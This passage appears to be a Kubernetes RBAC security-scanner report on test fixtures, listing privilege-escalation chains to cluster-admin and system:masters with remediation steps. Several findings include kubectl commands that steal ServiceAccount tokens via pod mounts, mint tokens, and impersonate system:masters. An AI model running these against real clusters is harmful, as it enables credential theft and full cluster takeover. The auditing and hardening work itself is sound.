  3. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. Wildcard verbs × wildcard resources wildcard_permission

    An RBAC rule with verbs: ["*"], resources: ["*"], and apiGroups: ["*"] is functionally identical to cluster-admin, even if it isn't called that. Often introduced by careless Helm charts or "give it permission to everything until it works" debugging.

    From ServiceAccount/rbac-fixtures/sa-wildcard
    Permission granted *:*:*
    Gives the attacker wildcard verbs on wildcard resources in wildcard API groups
Remediation
Break the chain at the weakest hop: remove the permission *:*:* that enables the first hop (ServiceAccount/rbac-fixtures/sa-wildcard/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the permission *:*:* that enables the first hop (ServiceAccount/rbac-fixtures/sa-wildcard/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
CRITICAL ServiceAccount/rbac-fixtures/sa-pod-create Cluster 9.3
ServiceAccount/rbac-fixtures/sa-pod-create can reach cluster-admin equivalent in 2 hop(s)
Scope: Cluster · Source: ServiceAccount/rbac-fixtures/sa-pod-create → cluster-admin equivalent (terminal sink is cluster-scoped: full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 2 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/rbac-fixtures/sa-bind-escalate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-bind-escalate
2. ServiceAccount/rbac-fixtures/sa-bind-escalate via bind_or_escalate (bind,escalate roles|clusterroles): can bypass RBAC escalation checks via bind/escalate

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-pod-create (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-pod-create (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-bind-escalate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-bind-escalate, the attacker uses the RBAC bind/escalate bypass (bind,escalate roles|clusterroles) to grant themselves any role they choose, typically cluster-admin. bind/escalate is the carve-out that lets the holder escape RBAC's normal "you can only grant what you have" guardrail.
  4. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-bind-escalate
  2. Step 2 of 2 RBAC bind/escalate bypass bind_or_escalate

    RBAC has a guardrail: you can only grant permissions you yourself hold. Two verbs override that guardrail: bind (on a Role/ClusterRole) and escalate (also on Roles). Holding either lets the attacker create a binding to a Role they don't have themselves, including cluster-admin.

    Scope matters. Granted by a ClusterRoleBinding the reach is cluster-wide; granted by a RoleBinding it bounds the bypass to the binding's namespace — namespace-admin instead of cluster-admin, but still a complete takeover of every workload, Secret, and ConfigMap in that namespace.

    From ServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted bind,escalate roles|clusterroles
    Gives the attacker can bypass RBAC escalation checks via bind/escalate
Remediation
Break the chain at the weakest hop: remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
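A lab-only sketch of hop 1 (pod_create_token_theft) as the engine validated it: create a pod that mounts the target ServiceAccount as the attacker identity, then read its projected token. The pod name is hypothetical; do not run this against a cluster you are not authorized to test.

# Hop-1 sketch: pod creation as sa-pod-create, mounting sa-bind-escalate.
kubectl apply --as=system:serviceaccount:rbac-fixtures:sa-pod-create -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: token-lift                 # hypothetical name
  namespace: rbac-fixtures
spec:
  serviceAccountName: sa-bind-escalate
  containers:
    - name: shell
      image: busybox
      command: ["sleep", "3600"]
EOF
# The projected token is now a usable credential for sa-bind-escalate.
kubectl exec -n rbac-fixtures token-lift -- \
  cat /var/run/secrets/kubernetes.io/serviceaccount/token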
CRITICAL ServiceAccount/rbac-fixtures/sa-token-create Cluster 9.3
ServiceAccount/rbac-fixtures/sa-token-create can reach cluster-admin equivalent in 2 hop(s)
Scope: Cluster · Source: ServiceAccount/rbac-fixtures/sa-token-create → cluster-admin equivalent (terminal sink is cluster-scoped: full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 2 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/rbac-fixtures/sa-bind-escalate via token_request (create serviceaccounts/token): can mint tokens for ServiceAccount rbac-fixtures/sa-bind-escalate
2. ServiceAccount/rbac-fixtures/sa-bind-escalate via bind_or_escalate (bind,escalate roles|clusterroles): can bypass RBAC escalation checks via bind/escalate

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-token-create (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-token-create (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls the serviceaccounts/token subresource (create serviceaccounts/token) to mint a fresh, valid token for ServiceAccount/rbac-fixtures/sa-bind-escalate. No pod creation required, and a thinner audit trail than the pod-mount route.
  3. Acting as ServiceAccount/rbac-fixtures/sa-bind-escalate, the attacker uses the RBAC bind/escalate bypass (bind,escalate roles|clusterroles) to grant themselves any role they choose, typically cluster-admin. bind/escalate is the carve-out that lets the holder escape RBAC's normal "you can only grant what you have" guardrail.
  4. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. Step 1 of 2 TokenRequest minting token_request

    The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs.

    From ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted create serviceaccounts/token
    Gives the attacker can mint tokens for ServiceAccount rbac-fixtures/sa-bind-escalate
  2. Step 2 of 2 RBAC bind/escalate bypass bind_or_escalate

    RBAC has a guardrail: you can only grant permissions you yourself hold. Two verbs override that guardrail: bind (on a Role/ClusterRole) and escalate (also on Roles). Holding either lets the attacker create a binding to a Role they don't have themselves, including cluster-admin.

    Scope matters. Granted by a ClusterRoleBinding the reach is cluster-wide; granted by a RoleBinding it bounds the bypass to the binding's namespace — namespace-admin instead of cluster-admin, but still a complete takeover of every workload, Secret, and ConfigMap in that namespace.

    From ServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted bind,escalate roles|clusterroles
    Gives the attacker can bypass RBAC escalation checks via bind/escalate
Remediation
Break the chain at the weakest hop: remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
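A sketch of hop 1 (token_request), assuming kubectl v1.24+ and a lab cluster: first confirm the verb resolves for this subject, then mint a token for the target ServiceAccount the same way an attacker would.

# Does the SA hold the TokenRequest verb the chain relies on?
kubectl auth can-i create serviceaccounts/token -n rbac-fixtures \
  --as=system:serviceaccount:rbac-fixtures:sa-token-create
# The primitive itself: mint a fresh token for the target SA.
kubectl create token sa-bind-escalate -n rbac-fixtures \
  --as=system:serviceaccount:rbac-fixtures:sa-token-create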
CRITICAL ServiceAccount/vulnerable/privileged-reader Cluster 9.3
ServiceAccount/vulnerable/privileged-reader can reach cluster-admin equivalent in 2 hop(s)
Scope: Cluster · Source: ServiceAccount/vulnerable/privileged-reader → cluster-admin equivalent (terminal sink is cluster-scoped: full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 2 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/vulnerable/privileged-reader → ServiceAccount/rbac-fixtures/sa-bind-escalate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-bind-escalate
2. ServiceAccount/rbac-fixtures/sa-bind-escalate via bind_or_escalate (bind,escalate roles|clusterroles): can bypass RBAC escalation checks via bind/escalate

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/vulnerable/privileged-reader (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/vulnerable/privileged-reader (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-bind-escalate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-bind-escalate, the attacker uses the RBAC bind/escalate bypass (bind,escalate roles|clusterroles) to grant themselves any role they choose, typically cluster-admin. bind/escalate is the carve-out that lets the holder escape RBAC's normal "you can only grant what you have" guardrail.
  4. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/vulnerable/privileged-reader → ServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-bind-escalate
  2. Step 2 of 2 RBAC bind/escalate bypass bind_or_escalate

    RBAC has a guardrail: you can only grant permissions you yourself hold. Two verbs override that guardrail: bind (on a Role/ClusterRole) and escalate (also on Roles). Holding either lets the attacker create a binding to a Role they don't have themselves, including cluster-admin.

    Scope matters. Granted by a ClusterRoleBinding the reach is cluster-wide; granted by a RoleBinding it bounds the bypass to the binding's namespace — namespace-admin instead of cluster-admin, but still a complete takeover of every workload, Secret, and ConfigMap in that namespace.

    From ServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted bind,escalate roles|clusterroles
    Gives the attacker can bypass RBAC escalation checks via bind/escalate
Remediation
Break the chain at the weakest hop: remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
CRITICAL

Subjects can impersonate `system:masters` in 1 hop(s), bypassing all RBAC

KUBE-PRIVESC-PATH-SYSTEM-MASTERS 4 subjects Score 9.6–9.1
MITRE ATT&CK: T1078.004 · T1098 · T1556 · T1068

Affected subjects (4)

CRITICAL ServiceAccount/rbac-fixtures/sa-impersonate Cluster 9.6
ServiceAccount/rbac-fixtures/sa-impersonate can impersonate `system:masters` in 1 hop(s), bypassing all RBAC
Scope: Cluster · Source: ServiceAccount/rbac-fixtures/sa-impersonate → system:masters (terminal sink is cluster-scoped: full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-impersonate

Subject ServiceAccount/rbac-fixtures/sa-impersonate can chain into the ability to impersonate the system:masters group. system:masters is special: the kube-apiserver hard-codes it as authorized for *every* operation regardless of RBAC. There is no Role or ClusterRole that grants system:masters reach. It is a pre-RBAC carve-out for kubeadm control-plane operators (cert-based auth with O=system:masters skips authorization entirely).

The chain (1 hop(s); each step is an RBAC verb the engine validated):
1. ServiceAccount/rbac-fixtures/sa-impersonate via impersonate_system_masters (impersonate groups): can impersonate the system:masters group, bypassing all RBAC

Impersonation of system:masters is the rarest but most severe finding type. Most clusters do not grant workload SAs impersonate on users or groups, and system:masters is the pathological consequence when they do: a single impersonate grant on a workload SA is the entire chain. CIS Kubernetes 5.1.4 and the RBAC good-practices guide explicitly call out impersonation grants for review.

Impact Impersonating system:masters bypasses every RBAC check the cluster ever had. Every API call succeeds. Audit logs are written but the actor field shows the impersonated principal; attribution requires reading the impersonate audit annotation.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/rbac-fixtures/sa-impersonate.
  2. Acting as ServiceAccount/rbac-fixtures/sa-impersonate, the attacker impersonates the system:masters group (impersonate groups). The kube-apiserver hard-codes that group as authorized for every operation regardless of RBAC. A single such grant collapses the entire authorization layer.
  3. Final step: attacker can impersonate group system:masters. The kube-apiserver short-circuits authorization for system:masters via the static token / certificate path, bypassing every RBAC check. They are now indistinguishable from a kubeadm control-plane operator.
  1. Impersonation of system:masters impersonate_system_masters

    The impersonate verb on groups: ["*"] (or explicitly on system:masters) lets the holder send requests as the hard-coded system:masters group. The kube-apiserver short-circuits authorization for that group, so every API call succeeds regardless of RBAC.

    This is the worst-case impersonation grant: it bypasses the cluster's entire RBAC layer rather than borrowing another principal's permissions.

    From ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted impersonate groups
    Gives the attacker can impersonate the system:masters group, bypassing all RBAC
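As a concrete illustration of this hop (the role shape and user name below are assumptions, not this cluster's actual objects), the grant is a single RBAC rule and exercising it is a pair of kubectl flags; kubectl requires a --as user alongside --as-group, and the user name is arbitrary because system:masters short-circuits authorization anyway:

    # Illustrative ClusterRole rule behind the finding
    rules:
      - apiGroups: [""]
        resources: ["users", "groups"]
        verbs: ["impersonate"]

    # From inside any workload bound to sa-impersonate:
    TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
    kubectl --token="$TOKEN" --as=anyone --as-group=system:masters auth can-i '*' '*'   # yes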
Remediation
Remove every impersonate grant on a path to system:masters. Concretely: remove the impersonate groups capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  1. List subjects with impersonate: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "User" or .kind == "Group" or .kind == "ServiceAccount") | .metadata.name + " → " + (.roleRef.name)' then check each role's rules for impersonate.
  2. Almost no production workload genuinely needs impersonate users/groups. Kubectl plugins/dashboards that *do* need it should use kubectl --as=... from a human admin's session, not a workload SA.
  3. Break the chain: remove the impersonate groups capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  4. For kubectl-as-a-service workloads, scope the impersonation with resourceNames: [<allowed-user>] to a fixed allowlist of principals; *never* users: [*] or groups: [*].
  5. Wire admission policy: a Kyverno rule that fails any RoleBinding granting impersonate to a non-system subject without an explicit resourceNames carve-out.
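Step 4 as a manifest fragment (principal name is a placeholder): the impersonation grant is scoped to an explicit allowlist instead of all users or groups.

    rules:
      - apiGroups: [""]
        resources: ["users"]
        verbs: ["impersonate"]
        resourceNames: ["ci-reporter@example.com"]   # the only principal this subject may impersonate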
CRITICAL ServiceAccount/rbac-fixtures/sa-pod-create Cluster 9.1
ServiceAccount/rbac-fixtures/sa-pod-create can impersonate `system:masters` in 2 hop(s), bypassing all RBAC
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-pod-create → system:masters: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create can chain into the ability to impersonate the system:masters group. system:masters is special: the kube-apiserver hard-codes it as authorized for *every* operation regardless of RBAC. There is no Role or ClusterRole that grants system:masters reach. It is a pre-RBAC carve-out for kubeadm control-plane operators (cert-based auth with O=system:masters skips authorization entirely).

The chain (2 hop(s); each step is an RBAC verb the engine validated):
1. ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/rbac-fixtures/sa-impersonate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-impersonate
2. ServiceAccount/rbac-fixtures/sa-impersonate/ via impersonate_system_masters (impersonate groups): can impersonate the system:masters group, bypassing all RBAC

Impersonation of system:masters is the rarest but most severe finding type. Most clusters do not give workload SAs impersonate on users/groups, and system:masters is the pathological consequence when they do: a single impersonate grant on a workload SA is the entire chain. CIS Kubernetes 5.1.4 and the RBAC good-practices guide explicitly call out impersonation grants for review.

Impact Impersonating system:masters bypasses every RBAC check the cluster ever had. Every API call succeeds. Audit logs are written but the actor field shows the impersonated principal; attribution requires reading the impersonate audit annotation.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/rbac-fixtures/sa-pod-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-impersonate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-impersonate, the attacker impersonates the system:masters group (impersonate groups). The kube-apiserver hard-codes that group as authorized for every operation regardless of RBAC. A single such grant collapses the entire authorization layer.
  4. Final step: attacker can impersonate group system:masters. The kube-apiserver short-circuits authorization for system:masters via the static token / certificate path, bypassing every RBAC check. They are now indistinguishable from a kubeadm control-plane operator.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-impersonate
  2. Step 2 of 2 Impersonation of system:masters impersonate_system_masters

    The impersonate verb on groups: ["*"] (or explicitly on system:masters) lets the holder send requests as the hard-coded system:masters group. The kube-apiserver short-circuits authorization for that group, so every API call succeeds regardless of RBAC.

    This is the worst-case impersonation grant: it bypasses the cluster's entire RBAC layer rather than borrowing another principal's permissions.

    From ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted impersonate groups
    Gives the attacker can impersonate the system:masters group, bypassing all RBAC
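A sketch of step 1 in practice (pod name and image are illustrative). Reading the token back requires pods/log or pods/exec on top of create pods; without those, the attacker simply has the pod POST the token to an endpoint they control.

    apiVersion: v1
    kind: Pod
    metadata:
      name: sa-lift                       # illustrative
      namespace: rbac-fixtures
    spec:
      serviceAccountName: sa-impersonate  # the SA being stolen
      restartPolicy: Never
      containers:
        - name: shell
          image: busybox
          command: ["sh", "-c", "cat /var/run/secrets/kubernetes.io/serviceaccount/token"]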
Remediation
Remove every impersonate grant on a path to system:masters. Concretely: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  1. List subjects with impersonate: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "User" or .kind == "Group" or .kind == "ServiceAccount") | .metadata.name + " → " + (.roleRef.name)' then check each role's rules for impersonate.
  2. Almost no production workload genuinely needs impersonate users/groups. Kubectl plugins/dashboards that *do* need it should use kubectl --as=... from a human admin's session, not a workload SA.
  3. Break the chain: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  4. For kubectl-as-a-service workloads, scope the impersonation with resourceNames: [<allowed-user>] to a fixed allowlist of principals; *never* users: [*] or groups: [*].
  5. Wire admission policy: a Kyverno rule that fails any RoleBinding granting impersonate to a non-system subject without an explicit resourceNames carve-out.
CRITICAL ServiceAccount/rbac-fixtures/sa-token-create Cluster 9.1
ServiceAccount/rbac-fixtures/sa-token-create can impersonate `system:masters` in 2 hop(s), bypassing all RBAC
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-token-create → system:masters: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create can chain into the ability to impersonate the system:masters group. system:masters is special: the kube-apiserver hard-codes it as authorized for *every* operation regardless of RBAC. There is no Role or ClusterRole that grants system:masters reach. It is a pre-RBAC carve-out for kubeadm control-plane operators (cert-based auth with O=system:masters skips authorization entirely).

The chain (2 hop(s); each step is an RBAC verb the engine validated):
1. ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/rbac-fixtures/sa-impersonate via token_request (create serviceaccounts/token): can mint tokens for ServiceAccount rbac-fixtures/sa-impersonate
2. ServiceAccount/rbac-fixtures/sa-impersonate/ via impersonate_system_masters (impersonate groups): can impersonate the system:masters group, bypassing all RBAC

Impersonation of system:masters is the rarest but most severe finding type. Most clusters do not give workload SAs impersonate on users/groups, and system:masters is the pathological consequence when they do: a single impersonate grant on a workload SA is the entire chain. CIS Kubernetes 5.1.4 and the RBAC good-practices guide explicitly call out impersonation grants for review.

Impact Impersonating system:masters bypasses every RBAC check the cluster ever had. Every API call succeeds. Audit logs are written but the actor field shows the impersonated principal; attribution requires reading the impersonate audit annotation.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/rbac-fixtures/sa-token-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls the serviceaccounts/token subresource (create serviceaccounts/token) to mint a fresh, valid token for ServiceAccount/rbac-fixtures/sa-impersonate. No pod creation required, and a thinner audit trail than the pod-mount route.
  3. Acting as ServiceAccount/rbac-fixtures/sa-impersonate, the attacker impersonates the system:masters group (impersonate groups). The kube-apiserver hard-codes that group as authorized for every operation regardless of RBAC. A single such grant collapses the entire authorization layer.
  4. Final step: attacker can impersonate group system:masters. The kube-apiserver short-circuits authorization for system:masters via the static token / certificate path, bypassing every RBAC check. They are now indistinguishable from a kubeadm control-plane operator.
  1. Step 1 of 2 TokenRequest minting token_request

    The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs.

    From ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted create serviceaccounts/token
